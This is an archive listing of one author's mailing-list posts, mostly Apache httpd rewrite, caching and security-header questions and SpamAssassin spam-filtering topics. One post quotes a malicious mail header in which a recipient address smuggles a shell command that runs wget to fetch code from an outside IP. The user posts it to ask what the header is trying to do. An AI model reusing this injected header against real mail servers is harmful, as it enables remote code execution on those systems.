Re: [users@httpd] Stripping query string except from specific URL

2024-04-28 Thread Dave Wreski
RewriteCond %{REQUEST_URI} !/resources/blog RewriteCond %{QUERY_STRING} ^start=\d+$ RewriteRule (.*)   /$1?    [L,R=301,QSD] [Sun Apr 28 15:40:02.614893 2024] ... rewrite 'resources/blog' -> 'index.php' [Sun Apr 28 15:40:02.614921 2024] ... internal redirect with

Re: [users@httpd] Stripping query string except from specific URL

2024-04-28 Thread Dave Wreski
Hi, I'm really quite stuck and hoped you could help. My apologies - the output was from wget, as that's what I typically use. $ curl 'https://guardiandigital.com/resources/blog?start=48' 301 Moved Permanently Moved Permanently The document has moved

Re: [users@httpd] Stripping query string except from specific URL

2024-04-24 Thread Dave Wreski
13 62.111.193.42 - - [24/Apr/2024:15:19:36 -0400] "GET /index.php HTTP/1.1" 200 33921 r:"-" "Wget/1.21.4" X:"SAMEORIGIN" 0/129431 573/35481/33921 H:HTTP/1.1 U:/index.php gd443 s:200 It did exactly what you asked, yes. Further, I asked you to use curl to see if you get redirected

Re: [users@httpd] Stripping query string except from specific URL

2024-04-24 Thread Dave Wreski
Hi, We have a situation where we need to strip a query string from all URLs except ones matching a particular pattern. However, when I try the rules below, it redirects to the homepage for some reason. In this example, I'd like to strip off the query

Re: [users@httpd] Stripping query string except from specific URL

2024-04-24 Thread Dave Wreski
Hi, We have a situation where we need to strip a query string from all URLs except ones matching a particular pattern. However, when I try the rules below, it redirects to the homepage for some reason. In this example, I'd like to strip off the query string from all URLs

[users@httpd] Stripping query string except from specific URL

2024-04-19 Thread Dave Wreski
Hi, We have a situation where we need to strip a query string from all URLs except ones matching a particular pattern. However, when I try the rules below, it redirects to the homepage for some reason. In this example, I'd like to strip off the query string from all URLs except those

Re: [users@httpd] RewriteMap and patterns

2024-03-28 Thread Dave Wreski
in the map to be really quick, then let the redirection.php script process the remaining legacy 70,000 or so...

Re: [users@httpd] RewriteMap and patterns

2024-03-28 Thread Dave Wreski
Hi, First make the proper redirections:   RewriteEngine on   RewriteMap lsv2ids "txt:/etc/httpd/conf.d/linuxsecurity-lsv2ids.map"   RewriteRule "/content/view/(.*)" "${lsv2ids:$1}" [R,L] Define the fallback for requests not ending in PHP but for which I hand the php handler to deal them.  

Re: [users@httpd] RewriteMap and patterns

2024-03-23 Thread Dave Wreski
Hi, What I would do is RewriteRule with just [L] tag for internal redirection or [R,L] if you don't mind the redirection to be external. Since I haven't seen the whole configuration my guess is you don't have the proper handler defined for the resulting url and that's why you get a 404, and

Re: [users@httpd] RewriteMap and patterns

2024-03-12 Thread Dave Wreski
On 3/11/24 4:42 PM, apmail-dferra...@apache.org wrote: On 09/03/2024 22:59, Dave Wreski wrote: Hi Eric, Might have to prefix with %{DOCUMENT_ROOT} I've tried variations of that, including the following, but no luck. They all fail with 400 or "invalid request" RewriteRule "

Re: [users@httpd] RewriteMap and patterns

2024-03-09 Thread Dave Wreski
Hi Eric, Might have to prefix with %{DOCUMENT_ROOT} I've tried variations of that, including the following, but no luck. They all fail with 400 or "invalid request" RewriteRule "/content/view/(.*)" "${lsv2ids:$1}" RewriteRule "/content/view/(.*)" "%{DOCUMENT_ROOT}${lsv2ids:$1}" [PT]

Re: [users@httpd] RewriteMap and patterns

2024-03-09 Thread Dave Wreski
Hi, I think the issue is that mod_proxy uses r->filename (i.e. what non-PT rewrites put the substitution) to setup the proxy sub-modules when using SetHandler to configure proxying. I'm not sure I understand what that means - do you have a recommendation for how I should configure this

Re: [users@httpd] RewriteMap and patterns

2024-03-08 Thread Dave Wreski
Hi, What you have looks reasonable, PT should be URL-to-URL. You might try logging %f in your logformat. I've added %f and it just shows some of what looks like components from the 404 page, not the redirected page. What kind of handler is meant to handle these requests and how is it

[users@httpd] RewriteMap and patterns

2024-03-07 Thread Dave Wreski
Hi, I'm trying to use RewriteMap on a few thousand older articles to map them to their modern equivalent. The pattern matches, but then the redirect doesn't occur. The examples and apache docs say I should be using [PT] to pass-through, but it results in a 404: [Thu Mar 07 09:56:47.696040

Re: [users@httpd] Limiting redirects with rewriterule/rewritecond

2024-02-29 Thread Dave Wreski
In my ongoing effort to reduce the number of redirects for linuxsecurity.com , I could use a bit more help. Currently we have one redirect to strip off any potential trailing slash as well as another that strips out any preceding 'www'.

[users@httpd] Limiting redirects with rewriterule/rewritecond

2024-02-25 Thread Dave Wreski
Hi, In my ongoing effort to reduce the number of redirects for linuxsecurity.com, I could use a bit more help. Currently we have one redirect to strip off any potential trailing slash as well as another that strips out any preceding 'www'. RewriteCond %{HTTP_HOST} ^www\.(.*)$ [NC]

[users@httpd] Reducing redirects

2024-01-25 Thread Dave Wreski
Hi, I think I have what is a pretty involved request for assistance. We have a website with content that is decades old and has tens of thousands of pages of content of the form /content/view/1234, where 1234 is the Joomla article ID. Joomla has since started using search-engine friendly

Re: [users@httpd] Removing trailing slashes with query strings

2024-01-18 Thread Dave Wreski
Hi, [Tue Jan 16 08:55:13.289205 2024] [rewrite:trace1] [pid 904886:tid 904938] mod_rewrite.c(493): [client 68.111.193.42:0 ] 68.195.193.42 - - [webstage.example.com/sid#560ba7f01a68][rid#7f2b1c0bc210/initial

Re: [users@httpd] Removing trailing slashes with query strings

2024-01-17 Thread Dave Wreski
Hi, [Tue Jan 16 08:55:13.289205 2024] [rewrite:trace1] [pid 904886:tid 904938] mod_rewrite.c(493): [client 68.111.193.42:0 ] 68.195.193.42 - - [webstage.example.com/sid#560ba7f01a68][rid#7f2b1c0bc210/initial

Re: [users@httpd] Removing trailing slashes with query strings

2024-01-16 Thread Dave Wreski
Hi, On 1/16/24 3:03 PM, Dave Wreski wrote: [Tue Jan 16 08:55:13.289205 2024] [rewrite:trace1] [pid 904886:tid 904938] mod_rewrite.c(493): [client 68.111.193.42:0] 68.195.193.42 - - [webstage.example.com/sid#560ba7f01a68][rid#7f2b1c0bc210/i

Re: [users@httpd] Removing trailing slashes with query strings

2024-01-16 Thread Dave Wreski
[Tue Jan 16 08:55:13.289205 2024] [rewrite:trace1] [pid 904886:tid 904938] mod_rewrite.c(493): [client 68.111.193.42:0 ] 68.195.193.42 - - [webstage.example.com/sid#560ba7f01a68][rid#7f2b1c0bc210/initial

Re: [users@httpd] Removing trailing slashes with query strings

2024-01-16 Thread Dave Wreski
Hi, I have the following rule that works well to remove trailing slashes from URLs: RewriteCond %{REQUEST_FILENAME} !-d RewriteRule ^(.*)/$ $1 [R=301,L] This is done to prevent the non-slash URL from being treated as duplicate content with the URL with a slash.

[users@httpd] Removing trailing slashes with query strings

2024-01-15 Thread Dave Wreski
Hi, I have the following rule that works well to remove trailing slashes from URLs: RewriteCond %{REQUEST_FILENAME} !-d RewriteRule ^(.*)/$ $1 [R=301,L] This is done to prevent the non-slash URL from being treated as duplicate content with the URL with a slash. The problem is that there

Re: [users@httpd] Rewrite query string?

2024-01-04 Thread Dave Wreski
https://example.com/search?searchword=CVE-2021-4014= I've tried the following RewriteCond/RewriteRule in various forms, but not sure what I'm doing wrong. RewriteCond %{QUERY_STRING} ^searchword=(.*) RewriteRule ^ q=$1 [NC,L] Ideas for what I'm doing wrong would be greatly appreciated. I

[users@httpd] Rewrite query string?

2024-01-04 Thread Dave Wreski
Hi, I'm trying to replace "searchword" with just "search" in the following URL: https://example.com/search?searchword=CVE-2021-4014= I've tried the following RewriteCond/RewriteRule in various forms, but not sure what I'm doing wrong. RewriteCond %{QUERY_STRING} ^searchword=(.*) RewriteRule

Re: [users@httpd] Removing trailing slashes?

2023-12-14 Thread Dave Wreski
Hi, I would stop using .htaccess files, first, and merge all rewrite rules in the relevant vhost / Directory block. Then, I would use the rewrite log to see what is really happening. Using multiple .htaccess files is a recipe to lose all your hair. These are Included in the directory

Re: [users@httpd] Removing trailing slashes?

2023-12-14 Thread Dave Wreski
Hi, I have a FAQ, but need some additional info I haven't been able to find. I'm trying to process links Google has indicated are 404s that never really ever existed on our site. I have an htaccess file I'm Including with my main apache config that only contains

[users@httpd] Removing trailing slashes?

2023-12-13 Thread Dave Wreski
Hi, I have a FAQ, but need some additional info I haven't been able to find. I'm trying to process links Google has indicated are 404s that never really ever existed on our site. I have an htaccess file I'm Including with my main apache config that only contains RewriteConds. This file is

[users@httpd] Tracing redirects

2023-11-24 Thread Dave Wreski
Hi, I have a link on our site that is caught in a redirect loop that I can't figure out. We have a few thousand redirects, making it very difficult to track down. I've tried enabling logging: LogLevel info rewrite:trace2 but even with just trace2, there are thousands of log lines

[users@httpd] RewriteRule and priorities

2023-07-16 Thread Dave Wreski
Hi, I have a rewriterule like: RewriteRule ^/blog/(.*) /resources/blog/$1 [L,R=301] but I also have several instances where there are exceptions. In other words, I have an article at /blog/ that I want to be redirected to some place other than /resources/blog. How can I do this? Order of

Re: [users@httpd] SetEnvIf and exceptions

2023-04-12 Thread Dave Wreski
Hi, On 4/11/23 8:59 PM, Tatsuki Makino wrote: Dave Wreski wrote on 2023/04/12 01:39: In case I wasn't clear, simply removing the caret was not enough to make this work. The "Require env SOMENAME2" was enough to begin blocking every page on the site with a 403, not just the

Re: [users@httpd] SetEnvIf and exceptions

2023-04-11 Thread Dave Wreski
Hi, SetEnvIf user-agent "(?i:TurnitinBot)" SOMENAME1 SetEnvIf Request_URI "^linuxsecurity_features\.*$" SOMENAME2 And let it meet all the requirements. Require all granted Require not env SOMENAME1 Require env SOMENAME2 This had the effect of

Re: [users@httpd] SetEnvIf and exceptions

2023-04-11 Thread Dave Wreski
Hi, SetEnvIf user-agent "(?i:TurnitinBot)" SOMENAME1 SetEnvIf Request_URI "^linuxsecurity_features\.*$" SOMENAME2 And let it meet all the requirements. Require all granted Require not env SOMENAME1 Require env SOMENAME2 This had the effect of blocking elements on every page (and

Re: [users@httpd] SetEnvIf and exceptions

2023-04-11 Thread Dave Wreski
Hi, On 4/10/23 11:48 PM, Tatsuki Makino wrote: Dave Wreski wrote on 2023/04/11 10:54: SetEnvIf user-agent "(?i:TurnitinBot)" stayout=1 SetEnvIf Request_URI "^linuxsecurity_features\.*$" !stayout I have done it in the past, too. It was like allowing another level of condi

Re: [users@httpd] SetEnvIf and exceptions

2023-04-10 Thread Dave Wreski
Hi, I don't know what is troubling you... For now, don't use the combination of Order,Allow,Deny and Require* in configuration file that will be created in 202x. :) AllowDeny of ENV should be replaced by the following. Allow from env=X_FOOBAR -> Require env X_FOOBAR It can write more

Re: [users@httpd] SetEnvIf and exceptions

2023-04-10 Thread Dave Wreski
Hi, On 4/10/23 10:51 AM, Eric Covener wrote: .htaccess: negative Require directive has no effect in directive Ah, I guess you'll have to restore the RequireAll and its contents. Yes, I should have mentioned that I've already done that - without it, it was producing a 500 error for

Re: [users@httpd] SetEnvIf and exceptions

2023-04-10 Thread Dave Wreski
Hi, I have an apache-2.4.56 install on fedora37 and trying to block some bots from accessing the site, unless they're trying to access our RSS feeds. How can I do this? I'm blocking the bots with SetEnvIF lines in the .htaccess file in the document root like:

[users@httpd] SetEnvIf and exceptions

2023-04-08 Thread Dave Wreski
Hi, I have an apache-2.4.56 install on fedora37 and trying to block some bots from accessing the site, unless they're trying to access our RSS feeds. How can I do this? I'm blocking the bots with SetEnvIF lines in the .htaccess file in the document root like: SetEnvIf user-agent

Re: Strange findings debugging bayes results

2023-02-16 Thread Dave Wreski
Hi, Here's also another 50+ headers we've collected over the years that I believe started as a list from AXB 10+ years ago. https://pastebin.com/raw/f6Fwh8HJ dave On 2/16/23 6:02 AM, Henrik K wrote: On Thu, Feb 16, 2023 at 10:18:50AM +0100, hg user wrote: I was investigating a bunch of

[users@httpd] Cloudflare logging and remote IP

2023-01-27 Thread Dave Wreski
Hi, I'd like to be able to track the original IP making requests, not the cloudflare IP. How can I do that? It appears both mod_remoteip and mod_cloudflare are extremely old, and mod_cloudflare is apparently deprecated altogether. Does it require rebuilding apache with the mod_remoteip

[users@httpd] cache_disk:error and AH00717 errors

2022-11-28 Thread Dave Wreski
Hi, I have an apache-2.4.54 server on fedora37, and seeing errors related to cache_disk, although this problem has been happening through many previous versions as well. [Mon Nov 28 11:29:38.432076 2022] [cache_disk:error] [pid 65726:tid 65836] (2)No such file or directory: [client

[users@httpd] CSP Violation: "blocked-uri": "inline" despite having 'unsafe-inline'

2022-09-21 Thread Dave Wreski
Hi, I've just recently started working with the Content-Security-Policy header for my apache/joomla/fedora35 install on a pretty complex website and having some problems. Here is my current CSP header: "default-src 'self' 'unsafe-inline'; font-src 'self' fonts.googleapis.com

Intuit servers sending paypal phishes

2022-05-06 Thread Dave Wreski
Hi, Intuit's servers are being used to send Paypal phishing invoices combined with the "evil numbers" scam. https://pastebin.com/iad07S8N Received: from o4.e.notification.intuit.com (o4.e.notification.intuit.com [167.89.82.160]) X-Spam-Status: No, score=-15.691 tagged_above=-200 required=5

Re: Why shouldn't I set the score for SPAM_99 and SPAM_999 higher?

2022-05-05 Thread Dave Wreski
That's a great call, thanks. I grepped my mail files and didn't find any SPAM_99 headers in any of them. You should be looking for BAYES_99 and BAYES_999 in your corpus. Thanks, Dave. I use my various mailboxes (sa-learn --ham --mbox /home/thomas.cameron/mail/INBOX/[mailbox file] and

Re: Why shouldn't I set the score for SPAM_99 and SPAM_999 higher?

2022-05-05 Thread Dave Wreski
You should probably check that none of your ham (i.e. non-spam) messages contains SPAM_99 or SPAM_999. It can happen when spammers poison your bayes database, and increased score in that case might lead to legitimate mail being misclassified as a spam. That's a great call, thanks. I grepped

Re: Seeing "check: exceeded time limit in ..." and need to resolve it

2021-11-16 Thread Dave Wreski
For that matter how many know about 'apropos'? And, even if they do, they may not discover 'locate' because 'apropos search' doesn't find either 'updatedb' or 'locate'. You have to enter 'apropos find' to discover that 'locate' exists, and even then you could get side tracked into trying to

[users@httpd] AH00717: Premature end of cache header

2021-09-20 Thread Dave Wreski
Hi, I'm seeing the following in the error_log with httpd-2.4.48-1.fc33.x86_64 [Mon Sep 20 16:03:43.127577 2021] [cache_disk:error] [pid 2940168:tid 2940247] (70014)End of file found: [client 141.101.76.246:16858] AH00717: Premature end of cache headers. Is this the same as this report

Re: [users@httpd] X-Frame-Options and security

2021-09-10 Thread Dave Wreski
https://httpd.apache.org/docs/2.4/en/mod/mod_headers.html#header What headers are returned by error pages and by redirects (e.g. 302 redirect when requesting a directory without a trailing '/')? What headers are returned by dynamic responses (proxied or CGI), if you have any? It appears to

Re: [users@httpd] X-Frame-Options and security

2021-09-10 Thread Dave Wreski
https://httpd.apache.org/docs/2.4/en/mod/mod_headers.html#header What headers are returned by error pages and by redirects (e.g. 302 redirect when requesting a directory without a trailing '/')? What headers are returned by dynamic responses (proxied or CGI), if you have any? It appears to

Re: [users@httpd] X-Frame-Options and security

2021-09-09 Thread Dave Wreski
e were using both GOFORIT and SAMEORIGIN values. I used lynx to dump the headers and it only displays SAMEORIGIN, as it should. Where else can I look to see where this option is being set? Thanks, Dave On 9/1/21 7:43 PM, Eric Covener wrote: On Wed, Sep 1, 2021 at 7:30 PM Dave Wreski wrot

Re: [users@httpd] mod_status over SSL?

2021-09-07 Thread Dave Wreski
Hi, You have server-status defined within an 80/http virtual host and as such I expect it will only be available via port 80/http. You can define server-status more globally or within an https configuration depending on what you want to support. However, bottom line is server-status and

[users@httpd] mod_status over SSL?

2021-09-07 Thread Dave Wreski
Hi, I have an apache-2.4.48 server on fedora34 and would like to enable mod_status to be able to obtain server status information. However, the docs appear to say the only way to access it is over port 80, not SSL. Is that correct? Chrome is also expecting the site to be over SSL, of

Re: [users@httpd] X-Frame-Options and security

2021-09-02 Thread Dave Wreski
"max-age=63072000; includeSubDomains" Header set Feature-Policy "geolocation 'self'; vibrate 'none'" Header set Content-Security-Policy "frame-ancestors 'self'" Thanks, Dave On 9/1/21 7:43 PM, Eric Covener wrote: On Wed, Sep 1, 2021 at 7:30 PM

[users@httpd] X-Frame-Options and security

2021-09-01 Thread Dave Wreski
Hi, I ran a security scan for X-Frame-Options (https://gf.dev/x-frame-options-test) on our site (https://linuxsecurity.com), and it returned SAMEORIGIN, which is good, but it also returned GOFORIT. The only settings we have are the following:     Header set X-XSS-Protection "1;

Re: More fake order spam

2021-04-27 Thread Dave Wreski
Invalid List-ID. You can then use that with other weirdness in a meta. header    __LIST_ID_DOMAIN_IN_BRACKETS List-id =~ /<([\w-]+)(\.[\w-]+)+>/ meta   LIST_ID_IMPROPER_FORMAT __HAS_LIST_ID && !__LIST_ID_DOMAIN_IN_BRACKETS score  LIST_ID_IMPROPER_FORMAT 0.001 describe

Re: More fake order spam

2021-04-27 Thread Dave Wreski
Hi, Investigate adding the SEM_FRESH rules - this domain was created less than five days ago. https://spameatingmonkey.com/services OK, how do I get those rules installed? I've only installed KAM rules using a channel. I don't see anything similar for SEM rules. I see the page you linked to

Re: More fake order spam

2021-04-27 Thread Dave Wreski
-2.5 RCVD_IN_HOSTKARMA_W    RBL: Sender listed in HOSTKARMA-WHITE [185.41.28.7 listed in hostkarma.junkemailfilter.com] We've reduced this score to -1 locally. -1.0 BAYES_00   BODY: Bayes spam probability is 0 to 1% Needs to be trained, obviously.

Re: [users@httpd] Random 500 errors

2021-04-20 Thread Dave Wreski
On 4/20/21 12:41 PM, Daniel Ferradal wrote: We can just speculate here to those questions. Rule of thumb if not showing in httpd error log, not httpd error. Thanks so much for your help. Would that include any RewriteRule entries? Of course just speculation, but that would lead me more

Re: [users@httpd] Random 500 errors

2021-04-20 Thread Dave Wreski
still being proxied, even though it's not being cached, and causing these errors? Would it explain why the same page doesn't always produce the error, or why not all pages produce a 500 error? Thanks, Dave On Tue, 20 Apr 2021 at 14:49, Dave Wreski () wrote: If the error comes from

Re: [users@httpd] Random 500 errors

2021-04-20 Thread Dave Wreski
pdate HTTP/1.1" 500 12704 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" 2/2408334 915/21235/12704 Thanks, Dave On Tue, 20 Apr 2021 at 4:03, Dave Wreski wrote: Hi, I have an apache-2.4.46 system on fedora33 and having wei

[users@httpd] Random 500 errors

2021-04-19 Thread Dave Wreski
Hi, I have an apache-2.4.46 system on fedora33 and having weird 500 errors that I can't explain. 72.70.38.104 - - [19/Apr/2021:21:38:56 -0400] "GET /advisories/debian/debian-dsa-2944-1-gnutls26-security-update HTTP/1.1" 500 12704 "-" "Mozilla/5.0 (compatible; bingbot/2.0;

Re: Spoofed amazon order email

2021-04-16 Thread Dave Wreski
Hi Steve, As Antony just reported, post these spamples to something like pastebin.com then provide a link so we can view the raw email. X-Spam-Checker-Version: SpamAssassin 3.4.2 (2018-09-13) on This is the first issue I see - you're likely missing a lot of additional features of later

[users@httpd] apache error 500 weirdness

2021-04-11 Thread Dave Wreski
Hi, I have an apache-2.4.46 system with php-7.4.16 on fedora33 site using cloudflare, although I'm not sure if it's related. This is an entry from our logs from a cloudflare IP: 172.68.34.214 - - [11/Apr/2021:21:22:11 -0400] "GET

Re: ANN: ReturnPath rule renaming

2021-03-26 Thread Dave Wreski
Hi,   RCVD_IN_RP_CERTIFIED -> RCVD_IN_VALIDITY_CERTIFIED   RCVD_IN_RP_SAFE -> RCVD_IN_VALIDITY_SAFE   RCVD_IN_RP_RNBL -> RCVD_IN_VALIDITY_RPBL Please audit your local config for score overrides and meta rules depending on the old names. I don't see that the VALIDITY rules exist yet. Will

[users@httpd] AH00717: Premature end of cache headers

2021-03-26 Thread Dave Wreski
Hi, I have an apache 2.4.46 system on fedora33 with php-7.4.16 and seeing the following errors pretty regularly on my joomla system: [Fri Mar 26 19:20:38.768857 2021] [cache_disk:error] [pid 2202202:tid 2202272] (70014)End of file found: [client 172.69.19.132:44102] AH00717: Premature end

Re: apache.org is blacklisted

2021-01-27 Thread Dave Wreski
On 1/27/21 7:40 AM, Matus UHLAR - fantomas wrote: On Wed, 27 Jan 2021, Benny Pedersen wrote: http://multirbl.valli.org/lookup/2a01%3A4f9%3Ac010%3A567c%3A%3A1.html i dont know how to handle this :=) On 26.01.21 17:43, John Hardin wrote: Only one lists it:  

Re: Emotet today..

2021-01-13 Thread Dave Wreski
Pedro, do you see sigs for it yet? We're seeing a ton of Doc.Dropper.EmotetRed1220-9816007-0. Have you submitted a sample to Steve at Sanesecurity and clamav? Best, Dave On 1/13/21 10:39 AM, Pedro David Marco wrote: Hi all... sorry for the semi off-topic... Today Emotet is being sent in an

Re: Scoring Based on IP Address

2020-12-17 Thread Dave Wreski
Hi, On 12/17/20 6:05 PM, Matt wrote: Is there a way with spamassassin local.conf to add a higher score based on source ip address or subnet? Basically the last IP in "Received:" header. bad_subnet_add_20_points: 192.168.240.0/24 Raising the score if that IP appeared anywhere in headers or

Re: adding AV scanning to working Postfix/SA system

2020-11-30 Thread Dave Wreski
On 11/30/20 7:00 PM, Joe Acquisto-j4 wrote: On 11/24/20 12:40 PM, Axb wrote: Fuglu supports Sophos AV See fuglu.org Sophos recently discontinued their support for SAVI on Linux. They now only support "Server Central Intercept X Advanced" which is an entirely different product. I would

Re: adding AV scanning to working Postfix/SA system

2020-11-24 Thread Dave Wreski
On 11/24/20 12:40 PM, Axb wrote: Fuglu supports Sophos AV See fuglu.org Sophos recently discontinued their support for SAVI on Linux. They now only support "Server Central Intercept X Advanced" which is an entirely different product. I would also be interested in newer/supported AV

Re: to: header is not in my domain

2020-10-20 Thread Dave Wreski
Thanks for quick reply, but blacklist what? The problem is I do not know this spammy domains. I want to give a score when To: field is NOT in anyaddr...@mydomain.com If only it were that easy. You'll notice that recipients of this mailing list receive mail to the mailing list address, not to

Re: IMPORTANT NOTICE FOR PEOPLE RUNNING TRUNK re: [Bug 7826] Improve language around whitelist/blacklist and master/slave

2020-07-10 Thread Dave Wreski
On 7/10/20 8:07 AM, Pedro David Marco wrote: >On Friday, July 10, 2020, 10:10:20 AM GMT+2, Axb wrote: >so glad to read this... confirms my picture of you. >now back my pet project: rewrite Tom Sawyer OK... who starts??? :-) once Finished we can rewrite "El Quixote" as well...

Re: [owl-users] First post - OWL looks really nice! - Q1

2020-07-06 Thread Dave Wreski
significance in the open source community, and should have been more clear in the article about its purpose and current role. We've made some changes, and would welcome a review: https://linuxsecurity.com/features/features/7-best-linux-distros-for-security-and-privacy-in-2020 Thanks, Dave Wreski I

Coronavirus domains

2020-03-17 Thread Dave Wreski
Hi all, Malwarepatrol has just released a list of 13,000+ domains related to coronavirus scams: https://www.malwarepatrol.net/wp-content/uploads/2020/03/covid-19-domains.txt https://www.malwarepatrol.net/wp-content/uploads/2020/03/covid-19-domains.zip Anyone else have any rules or changes

[users@httpd] cache_disk:error - AH00708: Cannot open data file

2020-01-17 Thread Dave Wreski
Hi all, I have an apache 2.4.41 system on fedora31 and having a disk cache problem: [Fri Jan 17 12:43:07.136283 2020] [cache_disk:error] [pid 188213:tid 14725280512] (2)No such file or directory: [client 40.108.163.149:59878] AH00708: Cannot open data file

SpamAssassin 18th anniversary article

2019-10-24 Thread Dave Wreski
Hi all, LinuxSecurity just posted an article on the history of SpamAssassin and its recent 18th anniversary, some of the new features coming in v4, and speaks with some of the lead developers.

Shell commands in Received and Delivered-To headers

2019-07-11 Thread Dave Wreski
Hi all, Anyone have a guess on what this is trying to accomplish? From r...@sab.com Thu Jul 11 11:05:10 2019 Return-Path: X-Original-To: root+${run{x2Fbinx2Fsht-ctx22wgetx20199.204.214.40x2fsbzx2f93.184.216.34x22}}@host.example.com Delivered-To: usern...@example.com Received: by

Re: [Maria-discuss] execute failed: Incorrect string value: '\xD6sterl...' with mariadb and perl DBD

2019-06-19 Thread Dave Wreski
? There are dozens of tables... Thanks, Dave -F On Jun 19, 2019, at 1:56 PM, Dave Wreski wrote: Hi, I'm trying to use perl-DBD to write a buffer of text that contains an email with umlauts and other non-ASCII characters to a joomla database and having a problem. DBD::mysql::st execute failed: Incorrect

[Maria-discuss] execute failed: Incorrect string value: '\xD6sterl...' with mariadb and perl DBD

2019-06-19 Thread Dave Wreski
Hi, I'm trying to use perl-DBD to write a buffer of text that contains an email with umlauts and other non-ASCII characters to a joomla database and having a problem. DBD::mysql::st execute failed: Incorrect string value: '\xD6sterl...' for column

[users@httpd] mod_cache_disk: AH00708: Cannot open data file

2019-04-01 Thread Dave Wreski
Hi all, I have a apache-2.4.34 system on fedora28 and have set up disk caching using "CacheQuickHandler off" to go through apache before being fetched from the cache and having some problems. [Mon Apr 01 14:16:48.908257 2019] [cache_disk:error] [pid 5955:tid 140305609242368] (2)No such file

[users@httpd] AH00708: Cannot open data file

2019-02-10 Thread Dave Wreski
Hi, I have a fedora28 system with httpd-2.4.34-3.fc28.x86_64 and having a problem with caching. I believe this started happening after we recently changed the hostname from "webstage" to "www". [Sun Feb 10 10:42:26.731666 2019] [cache_disk:error] [pid 997:tid 140189099861760] (2)No such

[users@httpd] Apache SuexecUserGroup and group permissions

2019-01-09 Thread Dave Wreski
Hi, I'm having trouble with permissions and ownership on a fedora28 system with apache-2.4 and joomla-3.9. I'd like to be able to have only the minimal number of files necessary to be owned by apache and have an ssh/sftp user have access to read and write every file in the document root.

Re: mysql 8 database problem

2018-12-08 Thread Dave Wreski
On 12/8/18 1:58 PM, Csaba Banhalmi wrote: Hi, I upgraded to mysql and since then I can’t use bases db to score my mails. Spam assassin -D says the following: [12254] dbg: bayes: tok_get_all: SQL error: Illegal mix of collations for operation ' IN ' [12254] dbg: bayes: cannot use bayes on

[users@httpd] Apache disk cache or app-based?

2018-10-23 Thread Dave Wreski
Hi, We're in the process of rebuilding one of our websites using a more modern version of joomla. The developers want to use an app called SpeedCache, which apparently provides browser cache as well as caching of the general site elements. I'm more inclined to use the built-in apache disk

Re: stackexchange.com in URIBL (false positive?)

2018-07-28 Thread Dave Wreski
  5.7 URIBL_BLACK    Contains an URL listed in the URIBL blacklist [URIs: stackexchange.com] I guess that's not supposed to be like that. I can't change anything at it, just for information for somebody in the position to fix that. It is indeed

Re: Just to lighten your day?

2018-05-03 Thread Dave Wreski
Hi, On 05/02/2018 02:21 PM, Joe Acquisto-j4 wrote: One slipped through, with this subtle sig line (thought it might brighten someones day . . . ) "Note: Failure to Verify will lead to final termination of your email account. Technical Team Email Administrator All Right Reversed 2018.(c)"

Re: sneaky spams w/zipped URL file, easily caught by "Thread-Index"

2018-03-27 Thread Dave Wreski
Hi, Excellent... except for one potential problem... this is in their "foxhole_all.cdb" file which they label as "high false positive risk" - which could scare some away! For those who don't score very high on ClamAv and/or who are able to score DIFFERENTLY based on different types of

***UNCHECKED*** Can't locate object method "trim_domain"

2018-01-26 Thread Dave Wreski
Hi, while learning an mbox on a recent 3.4.2 svn: # sa-learn --spam --progress --mbox junk-012618 28% [== ] 5.53 msgs/sec 00m44s LEFTUse of uninitialized value in lc at

Re: SA-Update not updating DB

2017-11-17 Thread Dave Wreski
On 11/17/2017 11:39 AM, Jari Fredriksson wrote: David Jones wrote on 16.11.2017 at 15.22: REV=1815298 wget http://sa-update.ena.com/${REV}.tar.gz wget http://sa-update.ena.com/${REV}.tar.gz.sha1 wget http://sa-update.ena.com/${REV}.tar.gz.asc sa-update -v --install

Re: SA-Update not updating DB

2017-11-16 Thread Dave Wreski
REV=1815298 wget http://sa-update.ena.com/${REV}.tar.gz wget http://sa-update.ena.com/${REV}.tar.gz.sha1 wget http://sa-update.ena.com/${REV}.tar.gz.asc sa-update -v --install ${REV}.tar.gz (reload/restart whatever is calling SA -- spamd, amavis-new, mimedefang, MailScanner, etc.) I have

Re: Problem with massive log files

2017-04-04 Thread Dave Wreski
Hi, I've posted the spamfilter.sh file to http://pasted.co/7b794ccd I don't see anything in there about verbose logging, but there are two lines in there with a resemblance to your suggestion: logger -f $SALOG -p mail.notice -t spamfilter <<<"Spam filter piping to SpamAssassin:

Re: Problem with massive log files

2017-04-04 Thread Dave Wreski
og file is up to 165 Gb. You should look at your logging and/or log rotating system to get this under control. I believe that's going to be /etc/logrotate.d/ Regards, Dave Kind regards. Jim. On 04/04/17 22:41, Dave Wreski wrote: Hi, My set up consists of Pos

Re: Problem with massive log files

2017-04-04 Thread Dave Wreski
Hi, My set up consists of Postfix, Postgrey, Spamassassin, Clam-AV, Amavis-new and Dovecot. What is "spamfilter"? Apr 2 10:31:26 oss2 spamfilter: Sun Oct 16 07:24:13 2016 [16208] info: spamd: connection from ip6-localhost [::1]:53930 to port 783, fd 5 What operating system? Regards,

Re: Define new variables in local.cf

2016-11-08 Thread Dave Wreski
Hi, having the regex into a variable would help maintenance. Something like: $BankList = "Bank1|Bank2|Bank3|Bank4" uri BANKURI /$BankList/i score BANKURI 0.2 body BANKBODY /$BankList/i score BANKBODY 0.1 is there any way to do this? You might try something like

Re: ClamAV.pm Plugin Not Working

2015-11-20 Thread Dave Wreski
clamdscan -c /etc/clamd.d/scan.conf eicar.txt /home/dan/eicar.txt: lstat() failed: Permission denied. ERROR It looks to be related to clamdscan performing a chroot() and the files you're referencing not being available from within that chroot. Try passing the --stream option. -bash-4.3$

Re: SPF and blocking phishing attempts

2015-10-14 Thread Dave Wreski
Hi, On 10/14/2015 06:08 PM, Dianne Skoll wrote: On Wed, 14 Oct 2015 17:51:23 -0400 Alex wrote: I'd like to make sure incoming mail that appears to be "From:" one of our internal users has indeed gone through one of the systems specified in the SPF record, resulting in

Re: Rules needed...

2015-06-27 Thread Dave Wreski
Hi, blacklist_from *@*.allisonarctictrips.com spf-pass take responselily Yes, after it's received, there are a ton of things that could be done to block it (including my local RBL). I was hoping for something preventative. Eh? I'm afraid I don't get this at all - greylisting and RBL

Re: Rules needed...

2015-06-26 Thread Dave Wreski
On 06/26/2015 12:45 PM, Benny Pedersen wrote: Alex Regan wrote on 2015-06-26 18:33: http://pastebin.com/FzUkEvRp blacklist_from *@*.allisonarctictrips.com spf-pass take responselily Yes, after it's received, there are a ton of things that could be done to block it (including my local

Re: PerMsgStatus Util warnings

2015-05-15 Thread Dave Wreski
